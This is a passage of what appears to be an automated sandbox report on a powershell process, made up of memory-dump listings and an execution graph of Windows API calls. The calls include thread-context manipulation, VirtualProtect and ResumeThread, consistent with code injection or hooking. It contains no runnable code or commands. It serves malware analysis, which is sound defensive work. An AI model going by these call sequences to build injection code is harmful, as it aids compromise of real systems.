                                            • Source File: 00000024.00000002.3044081865.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd343e0000_powershell.jbxd
                                            Similarity
                                            • API ID: CreateFile
                                            • String ID:
                                            • API String ID: 823142352-0

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3044081865.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd343e0000_powershell.jbxd
                                            Similarity
                                            • API ID: FileView
                                            • String ID:
                                            • API String ID: 3314676101-0

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3044081865.00007FFD343E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD343E0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd343e0000_powershell.jbxd
                                            Similarity
                                            • API ID: InformationModule
                                            • String ID:
                                            • API String ID: 3425974696-0
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3064631410.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd34660000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: I'_H
                                            • API String ID: 0-3212710135
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3046355367.00007FFD344B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD344B0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd344b0000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            Memory Dump Source
                                            • Source File: 00000024.00000002.3064631410.00007FFD34660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34660000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_36_2_7ffd34660000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:

                                            Execution Graph

                                            Execution Coverage: 1.5%
                                            Dynamic/Decrypted Code Coverage: 0%
                                            Signature Coverage: 0%
                                            Total number of Nodes: 1446
                                            Total number of Limit Nodes: 7
7559->7562 7568 1780dd21530 7559->7568 7561->7559 7562->7561 7564 1780dd211b5 RegCloseKey 7563->7564 7566 1780dd210bf 7563->7566 7564->7501 7565 1780dd210cf RegEnumValueW 7565->7566 7566->7564 7566->7565 7567 1780dd2114e GetProcessHeap HeapAlloc GetProcessHeap HeapFree 7566->7567 7567->7566 7569 1780dd21580 7568->7569 7572 1780dd2154a 7568->7572 7569->7559 7570 1780dd21569 StrCmpW 7570->7572 7571 1780dd21561 StrCmpIW 7571->7572 7572->7569 7572->7570 7572->7571 7574 1780dd214e2 GetProcessHeap HeapFree GetProcessHeap HeapFree 7573->7574 7575 1780dd214c2 GetProcessHeap HeapFree 7573->7575 7575->7574 7575->7575 8580 1780dd2b7ea 8581 1780dd2c2f4 14 API calls 8580->8581 8582 1780dd2b7ef 8581->8582 8583 1780dd2b85f 8582->8583 8584 1780dd2b815 GetModuleHandleW 8582->8584 8597 1780dd2b6f8 8583->8597 8584->8583 8587 1780dd2b822 8584->8587 8587->8583 8592 1780dd2b904 GetModuleHandleExW 8587->8592 8593 1780dd2b938 GetProcAddress 8592->8593 8594 1780dd2b94a 8592->8594 8593->8594 8595 1780dd2b95b FreeLibrary 8594->8595 8596 1780dd2b962 8594->8596 8595->8596 8596->8583 8609 1780dd2c558 EnterCriticalSection 8597->8609 8610 1780dd227e8 8611 1780dd22867 8610->8611 8612 1780dd228c9 GetFileType 8611->8612 8624 1780dd22998 8611->8624 8613 1780dd228ed 8612->8613 8614 1780dd228d7 StrCpyW 8612->8614 8626 1780dd21ad4 GetFinalPathNameByHandleW 8613->8626 8615 1780dd228fc 8614->8615 8618 1780dd22906 8615->8618 8620 1780dd2299d 8615->8620 8617 1780dd23f88 StrCmpNIW 8617->8620 8618->8624 8631 1780dd23f88 8618->8631 8634 1780dd23708 StrCmpIW 8618->8634 8638 1780dd21dd4 8618->8638 8620->8617 8621 1780dd23708 4 API calls 8620->8621 8622 1780dd21dd4 2 API calls 8620->8622 8620->8624 8621->8620 8622->8620 8627 1780dd21afe StrCmpNIW 8626->8627 8628 1780dd21b3d 8626->8628 8627->8628 8629 1780dd21b18 lstrlenW 8627->8629 8628->8615 8629->8628 8630 1780dd21b2a StrCpyW 8629->8630 8630->8628 8632 1780dd23faa 8631->8632 8633 1780dd23f95 StrCmpNIW 8631->8633 8632->8618 8633->8632 8635 1780dd2373a StrCpyW 
StrCatW 8634->8635 8636 1780dd23751 PathCombineW 8634->8636 8637 1780dd2375a 8635->8637 8636->8637 8637->8618 8639 1780dd21deb 8638->8639 8640 1780dd21df4 8638->8640 8641 1780dd21530 2 API calls 8639->8641 8640->8618 8641->8640 7744 1780dd28672 7747 1780dd290c0 7744->7747 7746 1780dd2869d 7748 1780dd29116 7747->7748 7749 1780dd290e1 7747->7749 7748->7746 7749->7748 7751 1780dd2c328 7749->7751 7752 1780dd2c33f 7751->7752 7753 1780dd2c335 7751->7753 7754 1780dd2d1f4 __free_lconv_num 13 API calls 7752->7754 7753->7752 7757 1780dd2c35a 7753->7757 7759 1780dd2c346 7754->7759 7756 1780dd2c352 7756->7748 7757->7756 7758 1780dd2d1f4 __free_lconv_num 13 API calls 7757->7758 7758->7759 7760 1780dd2d04c 7759->7760 7763 1780dd2cef8 7760->7763 7764 1780dd2cf23 7763->7764 7771 1780dd2cf94 7764->7771 7766 1780dd2cf4a 7767 1780dd2cf6d 7766->7767 7781 1780dd2c3e0 7766->7781 7769 1780dd2c3e0 _invalid_parameter_noinfo 17 API calls 7767->7769 7770 1780dd2cf82 7767->7770 7769->7770 7770->7756 7794 1780dd2ccc8 7771->7794 7776 1780dd2cfcf 7776->7766 7782 1780dd2c438 7781->7782 7783 1780dd2c3ef GetLastError 7781->7783 7782->7767 7784 1780dd2c404 7783->7784 7785 1780dd2cba0 _invalid_parameter_noinfo 14 API calls 7784->7785 7786 1780dd2c41e SetLastError 7785->7786 7786->7782 7787 1780dd2c441 7786->7787 7788 1780dd2c3e0 _invalid_parameter_noinfo 15 API calls 7787->7788 7789 1780dd2c467 7788->7789 7834 1780dd2ffe8 7789->7834 7795 1780dd2cd1f 7794->7795 7796 1780dd2cce4 GetLastError 7794->7796 7795->7776 7800 1780dd2cd34 7795->7800 7797 1780dd2ccf4 7796->7797 7807 1780dd2cba0 7797->7807 7801 1780dd2cd68 7800->7801 7802 1780dd2cd50 GetLastError SetLastError 7800->7802 7801->7776 7803 1780dd2d06c IsProcessorFeaturePresent 7801->7803 7802->7801 7804 1780dd2d07f 7803->7804 7812 1780dd2cd80 7804->7812 7808 1780dd2cbc8 FlsGetValue 7807->7808 7810 1780dd2cbc4 7807->7810 7808->7810 7809 1780dd2cbde SetLastError 7809->7795 7810->7809 7811 1780dd2c940 _invalid_parameter_noinfo 13 API calls 7810->7811 
7811->7809 7813 1780dd2cdba _invalid_parameter_noinfo 7812->7813 7814 1780dd2cde2 RtlCaptureContext RtlLookupFunctionEntry 7813->7814 7815 1780dd2ce2e RtlVirtualUnwind 7814->7815 7816 1780dd2ce64 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 7814->7816 7815->7816 7817 1780dd2ceb6 _invalid_parameter_noinfo 7816->7817 7820 1780dd28070 7817->7820 7821 1780dd28079 7820->7821 7822 1780dd28848 IsProcessorFeaturePresent 7821->7822 7823 1780dd28084 GetCurrentProcess TerminateProcess 7821->7823 7824 1780dd28860 7822->7824 7829 1780dd2891c RtlCaptureContext 7824->7829 7830 1780dd28936 RtlLookupFunctionEntry 7829->7830 7831 1780dd2894c RtlVirtualUnwind 7830->7831 7832 1780dd28873 7830->7832 7831->7830 7831->7832 7833 1780dd28814 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 7832->7833 7835 1780dd30001 7834->7835 7836 1780dd2c48f 7834->7836 7835->7836 7842 1780dd30a40 7835->7842 7838 1780dd30054 7836->7838 7839 1780dd3006d 7838->7839 7840 1780dd2c49f 7838->7840 7839->7840 7852 1780dd2e8c4 7839->7852 7840->7767 7843 1780dd2cab0 _invalid_parameter_noinfo 14 API calls 7842->7843 7844 1780dd30a4f 7843->7844 7850 1780dd30a95 7844->7850 7851 1780dd2c558 EnterCriticalSection 7844->7851 7850->7836 7853 1780dd2cab0 _invalid_parameter_noinfo 14 API calls 7852->7853 7854 1780dd2e8cd 7853->7854 8642 1780dd22ff0 8643 1780dd23061 8642->8643 8644 1780dd23384 8643->8644 8645 1780dd2308d GetModuleHandleA 8643->8645 8646 1780dd2309f GetProcAddress 8645->8646 8647 1780dd230b1 8645->8647 8646->8647 8647->8644 8648 1780dd230d8 StrCmpNIW 8647->8648 8648->8644 8654 1780dd230fd 8648->8654 8649 1780dd21a30 6 API calls 8649->8654 8650 1780dd2320f lstrlenW 8650->8654 8651 1780dd232b9 lstrlenW 8651->8654 8652 1780dd21cfc StrCmpIW StrCmpW 8652->8654 8653 1780dd23f88 StrCmpNIW 8653->8654 8654->8644 8654->8649 8654->8650 8654->8651 8654->8652 8654->8653 7855 1780dd2f870 7857 1780dd2f8c7 7855->7857 7858 1780dd2f8a0 7855->7858 7856 1780dd2cb10 
__free_lconv_num 13 API calls 7863 1780dd2f8b4 7856->7863 7859 1780dd2f99c 7857->7859 7878 1780dd2c558 EnterCriticalSection 7857->7878 7858->7856 7858->7857 7858->7863 7862 1780dd2fab3 7859->7862 7865 1780dd2fa03 7859->7865 7871 1780dd2f9ca 7859->7871 7860 1780dd2f904 7866 1780dd2fac0 7862->7866 7880 1780dd2c5ac LeaveCriticalSection 7862->7880 7863->7857 7863->7860 7864 1780dd2f949 7863->7864 7867 1780dd2d1f4 __free_lconv_num 13 API calls 7864->7867 7875 1780dd2fa61 7865->7875 7879 1780dd2c5ac LeaveCriticalSection 7865->7879 7870 1780dd2f94e 7867->7870 7872 1780dd2d04c _invalid_parameter_noinfo 38 API calls 7870->7872 7871->7865 7873 1780dd2cab0 _invalid_parameter_noinfo 14 API calls 7871->7873 7872->7860 7874 1780dd2f9f3 7873->7874 7876 1780dd2cab0 _invalid_parameter_noinfo 14 API calls 7874->7876 7877 1780dd2cab0 14 API calls _invalid_parameter_noinfo 7875->7877 7876->7865 7877->7875 8826 1780dd2f370 VirtualProtect 8827 1780dd25974 8828 1780dd2597a 8827->8828 8839 1780dd27fa0 8828->8839 8833 1780dd25a77 8835 1780dd25bfd 8833->8835 8838 1780dd259de 8833->8838 8852 1780dd27b80 8833->8852 8834 1780dd25cfb 8835->8834 8836 1780dd25d77 VirtualProtect 8835->8836 8837 1780dd25da3 GetLastError 8836->8837 8836->8838 8837->8838 8840 1780dd27fab 8839->8840 8841 1780dd259bd 8840->8841 8842 1780dd2b470 _invalid_parameter_noinfo 2 API calls 8840->8842 8843 1780dd27fca 8840->8843 8841->8838 8848 1780dd24400 8841->8848 8842->8840 8844 1780dd27fd5 8843->8844 8858 1780dd287b8 8843->8858 8862 1780dd287d8 8844->8862 8849 1780dd2441d 8848->8849 8851 1780dd2448c 8849->8851 8871 1780dd24670 8849->8871 8851->8833 8853 1780dd27bc7 8852->8853 8896 1780dd27950 8853->8896 8856 1780dd28070 _invalid_parameter_noinfo 8 API calls 8857 1780dd27bf1 8856->8857 8857->8833 8859 1780dd287c6 std::bad_alloc::bad_alloc 8858->8859 8866 1780dd29178 8859->8866 8861 1780dd287d7 8863 1780dd287e6 std::bad_alloc::bad_alloc 8862->8863 8864 1780dd29178 Concurrency::cancel_current_task 2 API calls 8863->8864 8865 
1780dd27fdb 8864->8865 8867 1780dd29197 8866->8867 8868 1780dd291e2 RaiseException 8867->8868 8869 1780dd291c0 RtlPcToFileHeader 8867->8869 8868->8861 8870 1780dd291d8 8869->8870 8870->8868 8872 1780dd246b7 8871->8872 8873 1780dd24694 8871->8873 8874 1780dd246ed 8872->8874 8891 1780dd24250 8872->8891 8873->8872 8885 1780dd24120 8873->8885 8877 1780dd24250 2 API calls 8874->8877 8878 1780dd2471d 8874->8878 8877->8878 8879 1780dd24753 8878->8879 8882 1780dd24120 3 API calls 8878->8882 8880 1780dd2476f 8879->8880 8883 1780dd24120 3 API calls 8879->8883 8881 1780dd2478b 8880->8881 8884 1780dd24250 2 API calls 8880->8884 8881->8851 8882->8879 8883->8880 8884->8881 8888 1780dd24141 8885->8888 8886 1780dd241b0 8886->8872 8887 1780dd24196 VirtualQuery 8887->8886 8887->8888 8888->8886 8888->8887 8889 1780dd241ca VirtualAlloc 8888->8889 8889->8886 8890 1780dd241fb GetLastError 8889->8890 8890->8888 8893 1780dd24268 8891->8893 8892 1780dd242bd VirtualQuery 8892->8893 8894 1780dd242d7 8892->8894 8893->8892 8893->8894 8895 1780dd24322 GetLastError 8893->8895 8894->8874 8895->8893 8897 1780dd2796b 8896->8897 8898 1780dd2798f 8897->8898 8899 1780dd27981 SetLastError 8897->8899 8898->8856 8899->8898 9093 1780dd346f5 9094 1780dd29324 __CxxCallCatchBlock 9 API calls 9093->9094 9095 1780dd3470d 9094->9095 9096 1780dd29324 __CxxCallCatchBlock 9 API calls 9095->9096 9097 1780dd34728 9096->9097 9098 1780dd29324 __CxxCallCatchBlock 9 API calls 9097->9098 9099 1780dd3473c 9098->9099 9100 1780dd29324 __CxxCallCatchBlock 9 API calls 9099->9100 9101 1780dd3477e 9100->9101 8655 1780dd2c1d8 8656 1780dd2c209 8655->8656 8657 1780dd2c1f1 8655->8657 8657->8656 8658 1780dd2d2a0 __free_lconv_num 13 API calls 8657->8658 8658->8656 9102 1780dd22ed8 9104 1780dd22f35 9102->9104 9103 1780dd22f50 9104->9103 9105 1780dd238a8 3 API calls 9104->9105 9105->9103 7881 1780dd2d658 7882 1780dd2d67d 7881->7882 7883 1780dd2d694 7881->7883 7884 1780dd2d1f4 __free_lconv_num 13 API calls 7882->7884 7890 1780dd2d724 
7883->7890 7897 1780dd2d7b6 7883->7897 7899 1780dd2d6da 7883->7899 7914 1780dd2d894 7883->7914 7976 1780dd2da18 7883->7976 7885 1780dd2d682 7884->7885 7886 1780dd2d04c _invalid_parameter_noinfo 38 API calls 7885->7886 7889 1780dd2d68d 7886->7889 8013 1780dd2bb54 7890->8013 7891 1780dd2d784 7895 1780dd2d2a0 __free_lconv_num 13 API calls 7891->7895 7894 1780dd2d836 7898 1780dd2d2a0 __free_lconv_num 13 API calls 7894->7898 7896 1780dd2d78b 7895->7896 7900 1780dd2d6fd 7896->7900 7904 1780dd2d2a0 __free_lconv_num 13 API calls 7896->7904 7897->7900 7907 1780dd2d2a0 __free_lconv_num 13 API calls 7897->7907 7902 1780dd2d841 7898->7902 7899->7900 7903 1780dd2d2a0 __free_lconv_num 13 API calls 7899->7903 7905 1780dd2d2a0 __free_lconv_num 13 API calls 7900->7905 7901 1780dd2d7d7 7901->7894 7901->7901 7911 1780dd2d87c 7901->7911 8019 1780dd30eb8 7901->8019 7906 1780dd2d85a 7902->7906 7909 1780dd2d2a0 __free_lconv_num 13 API calls 7902->7909 7903->7899 7904->7896 7905->7889 7910 1780dd2d2a0 __free_lconv_num 13 API calls 7906->7910 7907->7897 7909->7902 7910->7889 7912 1780dd2d06c _invalid_parameter_noinfo 17 API calls 7911->7912 7913 1780dd2d891 7912->7913 7915 1780dd2d8c2 7914->7915 7915->7915 7916 1780dd2d8de 7915->7916 7917 1780dd2d220 _invalid_parameter_noinfo 13 API calls 7915->7917 7916->7883 7918 1780dd2d90d 7917->7918 7919 1780dd2d926 7918->7919 7920 1780dd30eb8 38 API calls 7918->7920 7921 1780dd30eb8 38 API calls 7919->7921 7923 1780dd2d9fc 7919->7923 7920->7919 7922 1780dd2d943 7921->7922 7922->7923 7925 1780dd2d98d 7922->7925 7926 1780dd2d962 7922->7926 7935 1780dd2d97f 7922->7935 7924 1780dd2d06c _invalid_parameter_noinfo 17 API calls 7923->7924 7927 1780dd2da17 7924->7927 7930 1780dd2d977 7925->7930 8028 1780dd2eee0 7925->8028 7928 1780dd2d220 _invalid_parameter_noinfo 13 API calls 7926->7928 7932 1780dd2da7a 7927->7932 8037 1780dd313d8 7927->8037 7933 1780dd2d96d 7928->7933 7929 1780dd2d2a0 __free_lconv_num 13 API calls 7929->7923 7931 1780dd2d2a0 
__free_lconv_num 13 API calls 7930->7931 7930->7935 7931->7935 7939 1780dd2da8c 7932->7939 7944 1780dd2daa1 7932->7944 7936 1780dd2d2a0 __free_lconv_num 13 API calls 7933->7936 7935->7929 7936->7930 7937 1780dd2d9b5 7940 1780dd2d9ba 7937->7940 7941 1780dd2d9d0 7937->7941 7943 1780dd2d894 52 API calls 7939->7943 7945 1780dd2d2a0 __free_lconv_num 13 API calls 7940->7945 7942 1780dd2d2a0 __free_lconv_num 13 API calls 7941->7942 7942->7935 7946 1780dd2da9c 7943->7946 8046 1780dd2dd78 7944->8046 7945->7930 7948 1780dd28070 _invalid_parameter_noinfo 8 API calls 7946->7948 7950 1780dd2dd64 7948->7950 7950->7883 7951 1780dd2db1a 8058 1780dd2d30c 7951->8058 7955 1780dd2dba8 7956 1780dd2d894 52 API calls 7955->7956 7957 1780dd2dbb8 7956->7957 7957->7946 7959 1780dd2d2a0 __free_lconv_num 13 API calls 7957->7959 7958 1780dd2dd78 14 API calls 7969 1780dd2dbd2 7958->7969 7959->7946 7960 1780dd2f198 9 API calls 7960->7969 7962 1780dd2d894 52 API calls 7962->7969 7963 1780dd2dcc8 FindNextFileW 7965 1780dd2dce0 7963->7965 7963->7969 7964 1780dd2dd2a 7967 1780dd2dd38 FindClose 7964->7967 7970 1780dd2d2a0 __free_lconv_num 13 API calls 7964->7970 7968 1780dd2dd0c FindClose 7965->7968 8102 1780dd30b20 7965->8102 7966 1780dd2d2a0 13 API calls __free_lconv_num 7966->7969 7967->7946 7971 1780dd2dd48 7967->7971 7968->7946 7973 1780dd2dd1c 7968->7973 7969->7958 7969->7960 7969->7962 7969->7963 7969->7964 7969->7966 8080 1780dd2d4ac 7969->8080 7970->7967 7974 1780dd2d2a0 __free_lconv_num 13 API calls 7971->7974 7975 1780dd2d2a0 __free_lconv_num 13 API calls 7973->7975 7974->7946 7975->7946 7977 1780dd2da7a 7976->7977 7978 1780dd2da58 7976->7978 7980 1780dd2da8c 7977->7980 7983 1780dd2daa1 7977->7983 7978->7977 7979 1780dd313d8 38 API calls 7978->7979 7979->7978 7981 1780dd2d894 56 API calls 7980->7981 7982 1780dd2da9c 7981->7982 7985 1780dd28070 _invalid_parameter_noinfo 8 API calls 7982->7985 7984 1780dd2dd78 14 API calls 7983->7984 7986 1780dd2db0b 7984->7986 7987 1780dd2dd64 7985->7987 
7988 1780dd2f198 9 API calls 7986->7988 7989 1780dd2db1a 7986->7989 7987->7883 7988->7989 7990 1780dd2d30c 16 API calls 7989->7990 7991 1780dd2db7b FindFirstFileExW 7990->7991 7992 1780dd2dba8 7991->7992 8006 1780dd2dbd2 7991->8006 7993 1780dd2d894 56 API calls 7992->7993 7994 1780dd2dbb8 7993->7994 7994->7982 7996 1780dd2d2a0 __free_lconv_num 13 API calls 7994->7996 7995 1780dd2dd78 14 API calls 7995->8006 7996->7982 7997 1780dd2f198 9 API calls 7997->8006 7998 1780dd2d4ac 16 API calls 7998->8006 7999 1780dd2d894 56 API calls 7999->8006 8000 1780dd2dcc8 FindNextFileW 8002 1780dd2dce0 8000->8002 8000->8006 8001 1780dd2dd2a 8004 1780dd2dd38 FindClose 8001->8004 8007 1780dd2d2a0 __free_lconv_num 13 API calls 8001->8007 8005 1780dd2dd0c FindClose 8002->8005 8009 1780dd30b20 38 API calls 8002->8009 8003 1780dd2d2a0 13 API calls __free_lconv_num 8003->8006 8004->7982 8008 1780dd2dd48 8004->8008 8005->7982 8010 1780dd2dd1c 8005->8010 8006->7995 8006->7997 8006->7998 8006->7999 8006->8000 8006->8001 8006->8003 8007->8004 8011 1780dd2d2a0 __free_lconv_num 13 API calls 8008->8011 8009->8005 8012 1780dd2d2a0 __free_lconv_num 13 API calls 8010->8012 8011->7982 8012->7982 8014 1780dd2bba4 8013->8014 8015 1780dd2bb6c 8013->8015 8014->7891 8014->7901 8015->8014 8016 1780dd2d220 _invalid_parameter_noinfo 13 API calls 8015->8016 8017 1780dd2bb9a 8016->8017 8018 1780dd2d2a0 __free_lconv_num 13 API calls 8017->8018 8018->8014 8022 1780dd30ed5 8019->8022 8020 1780dd30eda 8021 1780dd2d1f4 __free_lconv_num 13 API calls 8020->8021 8025 1780dd30ef0 8020->8025 8027 1780dd30ee4 8021->8027 8022->8020 8023 1780dd30f24 8022->8023 8022->8025 8023->8025 8026 1780dd2d1f4 __free_lconv_num 13 API calls 8023->8026 8024 1780dd2d04c _invalid_parameter_noinfo 38 API calls 8024->8025 8025->7901 8026->8027 8027->8024 8029 1780dd2ef1f 8028->8029 8030 1780dd2ef02 8028->8030 8032 1780dd2ef29 8029->8032 8110 1780dd319f0 8029->8110 8030->8029 8031 1780dd2ef10 8030->8031 8033 1780dd2d1f4 __free_lconv_num 13 
API calls 8031->8033 8117 1780dd31a40 8032->8117 8036 1780dd2ef15 8033->8036 8036->7937 8038 1780dd313e0 8037->8038 8039 1780dd313f5 8038->8039 8041 1780dd3140e 8038->8041 8040 1780dd2d1f4 __free_lconv_num 13 API calls 8039->8040 8042 1780dd313fa 8040->8042 8043 1780dd31405 8041->8043 8045 1780dd2dd78 14 API calls 8041->8045 8044 1780dd2d04c _invalid_parameter_noinfo 38 API calls 8042->8044 8043->7927 8044->8043 8045->8043 8047 1780dd2dd9c 8046->8047 8048 1780dd2db0b 8046->8048 8047->8048 8049 1780dd2cab0 _invalid_parameter_noinfo 14 API calls 8047->8049 8048->7951 8054 1780dd2f198 8048->8054 8050 1780dd2ddb7 8049->8050 8136 1780dd2ffb4 8050->8136 8055 1780dd2f1a9 8054->8055 8056 1780dd2f1ca 8054->8056 8055->8056 8144 1780dd2ef88 8055->8144 8056->7951 8059 1780dd2d35a 8058->8059 8060 1780dd2d336 8058->8060 8061 1780dd2d3bf 8059->8061 8062 1780dd2d35f 8059->8062 8063 1780dd2d2a0 __free_lconv_num 13 API calls 8060->8063 8069 1780dd2d345 FindFirstFileExW 8060->8069 8163 1780dd2ec58 8061->8163 8065 1780dd2d374 8062->8065 8067 1780dd2d2a0 __free_lconv_num 13 API calls 8062->8067 8062->8069 8063->8069 8068 1780dd2c5d0 14 API calls 8065->8068 8067->8065 8068->8069 8069->7955 8069->7969 8081 1780dd2d4fa 8080->8081 8082 1780dd2d4d6 8080->8082 8083 1780dd2d55f 8081->8083 8084 1780dd2d500 8081->8084 8085 1780dd2d2a0 __free_lconv_num 13 API calls 8082->8085 8089 1780dd2d4e5 8082->8089 8166 1780dd2ece8 8083->8166 8087 1780dd2d515 8084->8087 8084->8089 8090 1780dd2d2a0 __free_lconv_num 13 API calls 8084->8090 8085->8089 8091 1780dd2c5d0 14 API calls 8087->8091 8089->7969 8090->8087 8091->8089 8103 1780dd30b52 8102->8103 8104 1780dd2d1f4 __free_lconv_num 13 API calls 8103->8104 8109 1780dd30b67 8103->8109 8105 1780dd30b5c 8104->8105 8106 1780dd2d04c _invalid_parameter_noinfo 38 API calls 8105->8106 8106->8109 8107 1780dd28070 _invalid_parameter_noinfo 8 API calls 8108 1780dd30ea8 8107->8108 8108->7968 8109->8107 8111 1780dd319f9 8110->8111 8112 1780dd31a12 HeapSize 8110->8112 
8113 1780dd2d1f4 __free_lconv_num 13 API calls 8111->8113 8114 1780dd319fe 8113->8114 8115 1780dd2d04c _invalid_parameter_noinfo 38 API calls 8114->8115 8116 1780dd31a09 8115->8116 8116->8032 8118 1780dd31a5f 8117->8118 8119 1780dd31a55 8117->8119 8121 1780dd31a64 8118->8121 8127 1780dd31a6b _invalid_parameter_noinfo 8118->8127 8129 1780dd2c5d0 8119->8129 8122 1780dd2d2a0 __free_lconv_num 13 API calls 8121->8122 8125 1780dd31a5d 8122->8125 8123 1780dd31a9e HeapReAlloc 8123->8125 8123->8127 8124 1780dd31a71 8126 1780dd2d1f4 __free_lconv_num 13 API calls 8124->8126 8125->8036 8126->8125 8127->8123 8127->8124 8128 1780dd2b470 _invalid_parameter_noinfo 2 API calls 8127->8128 8128->8127 8130 1780dd2c61b 8129->8130 8131 1780dd2c5df _invalid_parameter_noinfo 8129->8131 8132 1780dd2d1f4 __free_lconv_num 13 API calls 8130->8132 8131->8130 8133 1780dd2c602 HeapAlloc 8131->8133 8135 1780dd2b470 _invalid_parameter_noinfo 2 API calls 8131->8135 8134 1780dd2c619 8132->8134 8133->8131 8133->8134 8134->8125 8135->8131 8137 1780dd2ffc9 8136->8137 8139 1780dd2ddda 8136->8139 8138 1780dd30a40 _invalid_parameter_noinfo 14 API calls 8137->8138 8137->8139 8138->8139 8140 1780dd30020 8139->8140 8141 1780dd30035 8140->8141 8143 1780dd30048 8140->8143 8142 1780dd2e8c4 _invalid_parameter_noinfo 14 API calls 8141->8142 8141->8143 8142->8143 8143->8048 8145 1780dd2f078 8144->8145 8157 1780dd2efbd __vcrt_InitializeCriticalSectionEx 8144->8157 8162 1780dd2c558 EnterCriticalSection 8145->8162 8147 1780dd2efe2 LoadLibraryExW 8148 1780dd2f107 8147->8148 8149 1780dd2f007 GetLastError 8147->8149 8151 1780dd2f120 GetProcAddress 8148->8151 8152 1780dd2f117 FreeLibrary 8148->8152 8149->8157 8151->8145 8152->8151 8157->8145 8157->8147 8157->8151 8160 1780dd2f041 LoadLibraryExW 8157->8160 8160->8148 8160->8157 8165 1780dd2ec61 MultiByteToWideChar 8163->8165 8168 1780dd2ed0c WideCharToMultiByte 8166->8168 8169 1780dd3465f 8170 1780dd346e2 8169->8170 8171 1780dd34677 8169->8171 8171->8170 8172 1780dd29324 
__CxxCallCatchBlock 9 API calls 8171->8172 8173 1780dd346c4 8172->8173 8174 1780dd29324 __CxxCallCatchBlock 9 API calls 8173->8174 8175 1780dd346d9 8174->8175 8176 1780dd2c2f4 14 API calls 8175->8176 8176->8170 8177 1780dd3485e 8178 1780dd29324 __CxxCallCatchBlock 9 API calls 8177->8178 8179 1780dd3486c 8178->8179 8180 1780dd34877 8179->8180 8181 1780dd29324 __CxxCallCatchBlock 9 API calls 8179->8181 8181->8180 8659 1780dd225dc 8660 1780dd2265a 8659->8660 8661 1780dd226bf GetFileType 8660->8661 8668 1780dd22777 8660->8668 8662 1780dd226cd StrCpyW 8661->8662 8663 1780dd226e1 8661->8663 8667 1780dd226ee 8662->8667 8664 1780dd21ad4 4 API calls 8663->8664 8664->8667 8665 1780dd23f88 StrCmpNIW 8665->8667 8666 1780dd23708 4 API calls 8666->8667 8667->8665 8667->8666 8667->8668 8669 1780dd21dd4 2 API calls 8667->8669 8669->8667 9106 1780dd2f6dc 9107 1780dd2f6e8 9106->9107 9108 1780dd2f70f 9107->9108 9110 1780dd31c0c 9107->9110 9111 1780dd31c4c 9110->9111 9112 1780dd31c11 9110->9112 9111->9107 9113 1780dd31c32 DeleteCriticalSection 9112->9113 9114 1780dd31c44 9112->9114 9113->9113 9113->9114 9115 1780dd2d2a0 __free_lconv_num 13 API calls 9114->9115 9115->9111 8670 1780dd263e3 8671 1780dd263f0 8670->8671 8672 1780dd2655a 8671->8672 8673 1780dd263fc GetThreadContext 8671->8673 8676 1780dd26581 VirtualProtect FlushInstructionCache 8672->8676 8678 1780dd2663e 8672->8678 8673->8672 8674 1780dd26422 8673->8674 8674->8672 8675 1780dd26449 8674->8675 8681 1780dd264a6 SetThreadContext 8675->8681 8682 1780dd264cd 8675->8682 8676->8672 8677 1780dd2665e 8679 1780dd25530 3 API calls 8677->8679 8678->8677 8680 1780dd24b20 VirtualFree 8678->8680 8685 1780dd26663 8679->8685 8680->8677 8681->8682 8683 1780dd266b7 8686 1780dd28070 _invalid_parameter_noinfo 8 API calls 8683->8686 8684 1780dd26677 ResumeThread 8684->8685 8685->8683 8685->8684 8687 1780dd266ff 8686->8687 8900 1780dd27f60 8901 1780dd27f7c 8900->8901 8902 1780dd27f81 8900->8902 8904 1780dd28090 8901->8904 8905 1780dd280b3 
GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 8904->8905 8906 1780dd28127 8904->8906 8905->8906 8906->8902 8907 1780dd33960 8917 1780dd28ca0 8907->8917 8909 1780dd33988 8911 1780dd29324 __CxxCallCatchBlock 9 API calls 8912 1780dd33998 8911->8912 8913 1780dd29324 __CxxCallCatchBlock 9 API calls 8912->8913 8914 1780dd339a1 8913->8914 8915 1780dd2c2f4 14 API calls 8914->8915 8916 1780dd339aa 8915->8916 8920 1780dd28cd0 __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 8917->8920 8918 1780dd28dd1 8918->8909 8918->8911 8919 1780dd28d94 RtlUnwindEx 8919->8920 8920->8918 8920->8919 9116 1780dd306e0 9117 1780dd306e9 9116->9117 9118 1780dd306f9 9116->9118 9119 1780dd2d1f4 __free_lconv_num 13 API calls 9117->9119 9120 1780dd306ee 9119->9120 9121 1780dd2d04c _invalid_parameter_noinfo 38 API calls 9120->9121 9121->9118 8688 1780dd333e4 8689 1780dd333fb 8688->8689 8690 1780dd333f5 CloseHandle 8688->8690 8690->8689 8691 1780dd2f3e4 8692 1780dd2f41d 8691->8692 8693 1780dd2f3ee 8691->8693 8693->8692 8694 1780dd2f403 FreeLibrary 